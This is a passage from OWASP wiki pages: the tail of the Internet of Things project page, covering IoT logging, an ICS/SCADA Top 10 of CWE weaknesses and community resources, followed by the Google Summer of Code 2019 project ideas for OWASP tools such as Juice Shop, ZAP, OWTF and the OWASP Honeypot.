* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=GSoC2019_Ideas&diff=248539GSoC2019 Ideas2019-03-08T00:44:34Z<p>Aaron.guzman: /* IoT Goat */</p>
<hr />
<div>=OWASP Project Requests=<br />
<br />
'''Tips to get you started in no particular order:''' <br />
'''* Read [https://developers.google.com/open-source/gsoc/ Google Summer of Code Program(GSOC)]`'''<br />
'''* Read the [[GSoC SAT]] '''<br />
* Read the [https://www.owasp.org/index.php/GSoC GSOC Student Guidelines]<br />
* Contact us through the mailing list or irc channel.<br />
* Check our [https://github.com/OWASP github organization]<br />
<br />
<br />
==OWASP-SKF==<br />
<br />
=== '''Idea 1 Improving the Machine Learning chatbot:''' ===<br />
We want to extend the functionality of SKF Bot. (Security Knowledge Framework Chatbot):<br />
<br />
Some improvements or the suggestions which we can do to improve the functionality are:<br />
<br />
1. Create a desktop version of the chatbot. Where people can install the setup file on their local machine.<br />
<br />
2. Create a Plugin or website bot which we can add in the website for better chat experience for the user.<br />
<br />
3. Extend the bots capability to do the google search (using web scraping) for the things which are not available in the database. So, it will have a wider scope of knowledge.<br />
<br />
4. Add basic conversation flow which makes SKF Bot friendly and provides the better user experience. Example: Replies to the general queries like How are you? What is your Name etc?<br />
<br />
5. Extend the bot capability to reply to what security controls should be followed from the ASVS and MASVS or other custom checklists that are present in SKF.<br />
# Extend the bot to different platforms like Facebook, telegram, slack, Google Assistant etc.<br />
Existing chatbot implementation is on Gitter. You can test the bot by typing @skfchatbot on Gitter Community.<br />
<br />
'''Getting started:'''<br />
<br />
· Get familiar with the architecture and code base of SKF (Security Knowledge Framework)<br />
<br />
· Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
<br />
· Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
<br />
· Python 3+, Flask, Coffee Script<br />
<br />
'''Mentors and Leaders'''<br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor)<br />
<br />
=== '''Idea 2 Improving and building Lab challenges and write-ups:''' ===<br />
Build lab examples and write-ups (how to test) for different vulnerabilities over different technology stacks. These challenges are to be delivered in Docker so they can be <br />
<br />
easily deployed.<br />
<br />
In the current situation the security knowledge framework ultimately presents a list of security controls with correlating knowledge base items that contain a description and <br />
<br />
a solution. The new labs are used to give the software developers or application security specialists a more in depth understanding and approach on how to test the <br />
<br />
vulnerabilities in their own code. <br />
* For example we have now around 20 lab challenges in Docker container build in Python:<br />
** A Local File Inclusion Docker app example:<br />
*** https://github.com/blabla1337/skf-labs/tree/master/LFI<br />
** A write-up example:<br />
*** https://owasp-skf.gitbook.io/asvs-write-ups/filename-injection<br />
The images that are pushed to the Github repository are already automatically build and pushed to a docker registry where the SKF users can easily pull the images from to get their<br />
<br />
labs running. Of course they can download it and build it themselves from source by pulling the original repository. <br />
<br />
'''Mentors and Leaders''' <br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
== OWASP DefectDojo ==<br />
OWASP DefectDojo is a popular open source vulnerability management tool, used as the backbone for security programs. It is easy to get started with and work on! We welcome volunteers of all experience levels and are happy to provide mentorship.<br />
<br />
Option 1: Unit Tests - Difficulty: Easy<br />
* If you're new to programming, unit tests are short scripts designed to test a specific function of an application.<br />
* The project needs additional unit tests to ensure that new code functions properly. <br />
Option 2: Feature Enhancement - Difficulty: Varies<br />
* The functionality of DefectDojo is constantly expanding.<br />
* Feature enhancements offer programming challenges for all levels of experience.<br />
Option 3: Pull Request Review - Difficulty: Moderate - Hard<br />
* Test pull requests and provide feedback on code.<br />
<br />
== OHP (OWASP Honeypot) ==<br />
<br />
[[OWASP_Python_Honeypot|OWASP Honeypot]] is an open source software in Python language which designed for creating honeypot and honeynet in an easy and secure way! This project is compatible with Python 2.x and 3.x and tested on Windows, Mac OS X and Linux.<br />
<br />
=== Getting Start ===<br />
<br />
It's best to start from [https://github.com/zdresearch/OWASP-Honeypot/wiki GitHub wiki page], we are looking forward to adding more modules and optimize the core.<br />
<br />
=== Technologies ===<br />
<br />
Currently we are using<br />
<br />
* Docker<br />
* Python<br />
* MongoDB<br />
* TShark<br />
* Flask<br />
* ChartJS<br />
* And more linux services<br />
<br />
=== Expected Results ===<br />
<br />
* Zero Bugs: Currently we may have several bugs in different conditions, and it's best to test the all functions and fix them<br />
* Monitoring: Right now monitoring limited to the connections (send&recieve) and it's best to store and analysis the contents for farther investigations and recognizing incoming attacks.<br />
* Duplicated codes: codes are complicated and duplicated in engine, should be fixed/clean up<br />
* New modules: add some creative ICS/Network/Web modules andvulnerable web applications, services and stuff<br />
* API: update API sync to all features<br />
* WebUI: Demonstrate and add API on WebUI and Live version with all features<br />
* WebUI Special Reports: Track the attacks more creative and provide high risk IPs<br />
* Database: Better database structure, faster and use queue<br />
* Data analysis: Analysis stored data and attack signatures<br />
* OWASP Top 10: Preparing useful processed/raw data for OWASP top 10 project<br />
<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Packet Analysis & Tshark & Libpcap<br />
* Docker<br />
* Database<br />
* Web Development Skills<br />
* Honeypot and Deception knowledge<br />
<br />
=== Mentors and Leaders ===<br />
<br />
* [mailto:ali.razmjoo@owasp.org Ali Razmjoo] (Mentor & Project Leader)<br />
* [mailto:ehsan@nezami.me Ehsan Nezami] (Mentor & Project Leader)<br />
* [mailto:reza.espargham@owasp.org Reza Espargham](Mentor)<br />
* [mailto:abiusx@owasp.org Abbas Naderi] (Mentor)<br />
<br />
== OWASP Juice Shop ==<br />
<br />
[[OWASP Juice Shop Project]] is an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws. Juice Shop is written in Node.js, Express and Angular. The application contains more than 30 challenges of varying difficulty where the user is supposed to exploit the underlying vulnerabilities. Apart from the hacker and awareness training use case, pentesting proxies or security scanners can use Juice Shop as a "guinea pig"-application to check how well their tools cope with Javascript-heavy application frontends and REST APIs.<br />
The best way to get in touch with us is the '''community chat on https://gitter.im/bkimminich/juice-shop<nowiki/>.''' You can also send PMs to the potential mentors (@bkimminich, @J12934 and @CaptainFreak) there if you like!<br />
<br />
To receive early feedback please '''put your proposal on Google Docs and submit it to the OWASP Organization on Google's GSoC page''' in ''Draft Shared'' mode. Please pick '''''juice shop'' as Proposal Tag''' to make them easier to find for us. '''Thank you!'''<br />
<br />
=== Feature Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new functionality and "business" features are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Afeature GitHub issues labeled "feature"]. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for features and new functionality in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP Juice Shop (not necessarily including corresponding challenges)<br />
* Each feature comes with full functional unit and integration tests<br />
* Extending the functional walk-through chapter of the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, security knowledge is optional.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Juice Shop Mobile ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
A complete mobile client for Juice-Shop API which will serve a legit mobile experience for Juice-Shop user as well as a plethora of Mobile app vulnerabilities and challenges around them to solve. Should in the best case translate the idea of Juice Shop's hacking challenges with a score board and success notifications into the mobile world.<br />
<br />
''Coming up with a sophisticated proposal (optimally even with a good initial sample implementation) could make the difference between being selected or declined as a student for this project!''<br />
<br />
''' Getting started '''<br />
* Get familiar with the architecture and code base of the application's RESTful backend<br />
* Get familiar with Native App developement<br />
* Get familiar with Mobile vulnerabilities<br />
<br />
'''Expected Results:'''<br />
* A mobile App with consistent UI/UX for Juice-Shop with standard client side vulnerabilities.<br />
* Sufficient initial release quality (en par with Juice Shop and Juice Shop CTF) to make it an official extension project hosted in its own GitHub repository ''bkimminich/juice-shop-mobile''<br />
* Code follows existing styleguides and applies similar quality gates regarding code smells, test coverage etc. as the main project.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) React Native and NodeJS/Express, some Mobile security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Challenge Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new hacking challenges are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Achallenge GitHub issues labeled "challenge"]. This project could implement a whole bunch of challenges one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for challenges in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 10 or more new challenges for OWASP Juice Shop (including required functional enhancements to place the challenges)<br />
* Each challenge comes with full functional unit and integration tests<br />
* Each challenge is verified to be exploitable by corresponding end-to-end tests<br />
* Hint and solution sections for each new challenge are added to the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Hacking Instructor ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
While the Juice Shop is offering a lot of long-lasting motivation and challenges for security experts, it might be a bit daunting for newcomers and less experienced hackers.<br />
The "Hacking Instructor" as sketched in [https://github.com/bkimminich/juice-shop/issues/440 GitHub issue #440] could guide users from this target audience through at least some of the hacking challenges. As this would be an entirely new and relatively independent feature of the Juice Shop, students should be able to bring in their own creativity and ideas a lot.<br />
<br />
''For this project, a good proposal with a design & implementation proposal more sophisticated than the rough ideas in [https://github.com/bkimminich/juice-shop/issues/440 #440] is paramount to be selected as a student!''<br />
<br />
'''Expected Results:'''<br />
* A working implementation of e.g. an avatar-style "Hacking Instructor" or other solution based on the students own proposal<br />
* Coverage of at least the trivial (1-star) and some easy (2-star) challenges<br />
* Documentation how to configure or script the "Hacking Instructor" for challenges in general<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular, some UI/UX experience would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Your idea ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
You have an awesome idea to improve OWASP Juice Shop that is not on this list? Great, please submit it!<br />
<br />
''' Getting started '''<br />
* Get in touch with [https://www.owasp.org/index.php/User:Bjoern_Kimminich Bjoern Kimminich]<br />
<br />
'''Expected Results:'''<br />
* A new feature that makes OWASP Juice Shop even better<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Mentors:''' <br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
<br />
==OWASP-Securetea Tools Project ==<br />
The purpose of this application is to warn the user (via various communication mechanisms) whenever their laptop accessed. This small application was developed and tested in python in Linux machine is likely to work well on the Raspberry Pi as well. -<br />
https://github.com/OWASP/SecureTea-Project/blob/master/README.md<br />
<br />
===Brief Explanation===<br />
We are looking any awesome idea to improve Securetea Project that is not on this list? We are expecting make this project will be useful to everyone to secure their Small IoT. <br />
<br />
===Idea===<br />
Below roadmap and expect results you can choose to improve Securetea Project . <br />
if any bugs please help to fix it<br />
<br />
===Roadmap=== <br />
See Our Roadmap<br><br />
https://github.com/OWASP/SecureTea-Project#roadmap<br><br />
Notify by Twitter (done)<br><br />
Securetea Dashboard / Gui (done)<br><br />
<br />
===Expect Results ===<br />
<br><br />
Securetea Protection /firewall<br><br />
Securetea Antivirus<br><br />
Notify by Whatsapp<br><br />
Notify by SMS Alerts<br><br />
Notify by Line<br><br />
Notify by Telegram<br><br />
Intelligent Log Monitoring<br><br />
Login History<br><br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (OWASP Securetea Project Leader) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A]]- (OWASP Securetea Project Leader)<br />
<br><br />
<br />
==OWASP OWTF==<br />
'''[https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)]''' is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST. Most of the ideas below focus on rewrite of some major components of OWTF to make it more modular. OWTF is moving to a fresh codebase with a fully Docker testing and deployment environment. If you want to get a jumpstart, check out https://github.com/owtf/owtf/tree/new-arch.<br />
===OWASP OWTF - MiTM proxy interception and replay capabilities===<br />
'''Brief Explanation:'''<br />
<br />
The OWTF man-in-the-middle proxy is written completely in Python (based on the excellent Tornado framework) and was benchmarked to be the fastest MiTM python proxy. However it lacks the useful and much need interception and replay capabilities of mitmproxy (https://github.com/mitmproxy/mitmproxy).<br />
<br />
The current implementation of the MiTM proxy serves its purpose very well. Its fast but its not extensible. There are a number of good use cases for being extensible<br />
*ability to intercept the transactions<br />
*modify or replay transaction on the fly<br />
*add additional capabilities to the proxy (such as session marking/changing) without polluting the main proxy code<br />
Bonus:<br />
*Design and implement a proxy plugin (middleware) architecture so that the plugins can be defined separately and the user can choose what plugins to include dynamically (from the web interface).<br />
*Replace the current Requester (based on urllib, urllib2) with a more robust Requester based on the new urllib3 with support for a real headless browser factory. The typical flow when requested for an authenticated browser instance (using PhantomJS)<br />
<br />
*The "Requester" module checks if there is any login parameters provided (i.e form-based or script - look at https://github.com/owtf/login-sessions-plugin)<br />
*Create a browser instance and do the necessary login procedure<br />
*Handle the browser for the URI<br />
*When called to close the browser, do a clean logout and kill the browser instance.<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
'''Knowledge Prerequisite:''' Python proficiency, some previous exposure to security concepts and penetration testing is welcome but not strictly necessary as long as there is will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - Web interface enhancements===<br />
'''Brief explanation:'''<br />
<br />
The current web interface is a mixture of Tornado Jinja templates and ReactJS. A complete UI change to a stable ReactJS-based interface should be the deliverable for this project. Most of the hard part for the change has already been done and added in a separate branch at https://github.com/owtf/owtf/tree/develop.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT:Clean, maintainable (ES6 compatible and using recommended design patterns) React (JavaScript) code. ([https://github.com/getsentry/zeus/tree/master/webapp This] is a good example!)'''<br />
*'''IMPORTANT: Thoroughly documented code along with API examples and example future components.'''<br />
*'''CRITICAL''': Excellent reliability and performance.<br />
*Unit tests / Functional tests and easy to setup testing environment (preferably automated).<br />
'''Knowledge Prerequisite:''' Python (reading API source code and endpoints), React.JS (high proficiency) and general JavaScript proficiency.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren][mailto:viyat.bhalodia@owasp.org Viyat Bhalodia][mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] OWASP OWTF Project Leaders<br />
===OWASP OWTF - New plugin architecture===<br />
'''Brief explanation:'''<br />
<br />
The current plugin system is not very useful and it is painful to browse many plugins. Most of the plugins do have much code and most of is repeated - much refactoring needed there.<br />
<br />
This issue is documented in detail at https://github.com/owtf/owtf/issues/905.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
<br />
== OWASP iGoat (draft) ==<br />
'''Idea 1:''' Completing OWASP iGoat documentation at https://docs.igoatapp.com/ and creating demo videos at for OWASP iGoat YouTube channel for learning purpose.<br />
<br />
'''Idea 2:''' Adding new challenge pack / CTF for iGoat. It should be one point solution for learning iOS app security<br />
<br />
== OWASP Seraphimdroid ==<br />
<br />
=== Idea 1: Anomaly detection of device state ===<br />
The idea is that certain features of a device would be constantly monitored (battery use, internet usage, opp calls, etc.). Initially, the usual behaviour of the device would be learned. Later, anomalies normal behavior would be reported to the user. This should involve some explanations, such as which applications are causing an anomaly the device behaviors <br />
<br />
=== Idea 2: On device machine learning of maliciousness of an app ===<br />
Tensor-flow for on-device processing and some other libraries have been released that enable machine learning. We have previously applied a system, that based on permissions, is able to distinguish malicious apps from non-malicious. Now, we would like to learn also from other outputs and things one can monitor about application whether it can be malicious. <br />
<br />
=== Idea 3: Enhansing privacy features ===<br />
The vision of Seraphimdroid is to be aware of privacy threats. This may be achieved throug knowing which applications are using user accounts or other information that user has on phone to send to the server, or just by knowing which applications may be doing it. Knowledge base should be extending with the suggestions on how to improve privacy. Also, automated settings of various apps to use encryption should be proposed.<br />
==OWASP ZAP==<br />
[[OWASP Zed Attack Proxy Project]] (ZAP) The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. Previous GSoC students have implemented key parts of the ZAP core functionality and have been offered (and accepted) jobs based on their work on ZAP.<br />
<br />
=== Active Scanning WebSockets ===<br />
: '''Brief Explanation:'''<br />
: ZAP has good support for websockets, and allows them to be intercepted, changed and fuzzed. Unfortunately it doesn't currently support active scanning (automated attacking) of websocket traffic (messages).<br />
: We would like to add active scanning support to websockets, ideally in a generic way which would allow us to reuse as many of our existing rules as are relevant. Adding additional websocket specific attacks would also be very useful.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* An pluggable infrastructure that allows us to active scan websockets<br />
:* Converting the relevant existing scan rules to work with websockets<br />
:* Implementing new websocket specific scan rules<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
=== Automated Authentication Detection and Configuration ===<br />
: '''Brief Explanation:'''<br />
: Currently a user must manually configure ZAP to handle authentication, eg as per <nowiki>https://github.com/zaproxy/zaproxy/wiki/FAQformauth</nowiki><br />
: This is time consuming and error prone.<br />
: Ideally ZAP would help detect login and registration pages and provide more assistance when configuring authentication, ideally being able to completely automate the task for as many sort of webapps as possible.<br />
